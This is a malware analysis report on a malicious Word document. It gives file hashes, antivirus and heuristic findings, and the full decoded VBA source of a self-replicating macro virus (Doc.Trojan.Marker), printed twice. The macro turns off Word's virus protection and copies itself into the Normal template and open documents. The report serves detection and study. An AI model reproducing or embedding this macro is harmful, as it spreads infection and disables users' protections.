Office (OLE) malware analysis — malicious · 9cc7b2865ccafb1a

MALICIOUS

Office (OLE)

302.5 KB Created: 2007-06-02 22:28:00 Authoring application: Microsoft Word 10.0 First seen: 2014-06-27

MD5: 94a2e613ccc0ab5437152c32fe177392 SHA-1: 7e1c49b13d687e3bf99000fb0c4691c5fc003735 SHA-256: 9cc7b2865ccafb1a0f7ccdd60f73ad0ae6e8cc76a058ac3468d5f666eae42acb

148 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros. The `Document_Open` subroutine is designed to disable virus protection and replicate its code into both the active document and the Normal.dot template, indicating a self-replication and persistence mechanism. The ClamAV detection and critical heuristics for macro-virus replication and AV tampering strongly support this assessment.

Heuristics 4

ClamAV: Doc.Trojan.Marker-35 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Marker-35
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
'Switch the VirusProtection OFF
Options.VirusProtection = False
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Attribute VB_Customizable = True
Private Sub Document_Open()
'
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1591 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1591 bytes
SHA-256: `f444fdd17e27c2cc3aa7bafa46250018151dc8880c977327c6cfaf6789fdef7a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() ' ' ******** Anti-Virus macro by Patrick ******** ' ' <- this is a marker! ' DO NOT delete or alter the above marker line since the original virus looks for it ' and will not infect the document if the above line exists Const Marker = "Patricks marker!" On Error Resume Next 'Declare Variables Dim SaveDocument, SaveNormalTemplate, DocumentInnoculated, NormalTemplateInnoculated As Boolean Dim ad, nt As Object Dim OurCode, UserAddress, LogData, LogFile As String 'Initialize Variables Set ad = ActiveDocument.VBProject.VBComponents.Item(1) Set nt = NormalTemplate.VBProject.VBComponents.Item(1) DocumentInnoculated = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000) NormalTemplateInnoculated = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000) 'Switch the VirusProtection OFF Options.VirusProtection = False 'Innoculate the NormalTemplate If DocumentInnoculated = True Then OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines) nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines nt.CodeModule.AddFromString OurCode NormalTemplate.Save End If 'Innoculate the ActiveDocument OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines) ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines ad.CodeModule.AddFromString OurCode ActiveDocument.Save End Sub

SHA-256: f444fdd17e27c2cc3aa7bafa46250018151dc8880c977327c6cfaf6789fdef7a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'
' ********** Anti-Virus macro by Patrick **********
'
' <- this is a marker!
' DO NOT delete or alter the above marker line since the original virus looks for it
' and will not infect the document if the above line exists

Const Marker = "Patricks marker!"
On Error Resume Next

'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInnoculated, NormalTemplateInnoculated As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String

'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

DocumentInnoculated = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInnoculated = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)

'Switch the VirusProtection OFF
Options.VirusProtection = False

  'Innoculate the NormalTemplate
  If DocumentInnoculated = True Then
    OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
    nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
    nt.CodeModule.AddFromString OurCode
    NormalTemplate.Save
  End If

  'Innoculate the ActiveDocument
    OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
    ad.CodeModule.AddFromString OurCode
    ActiveDocument.Save
  
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.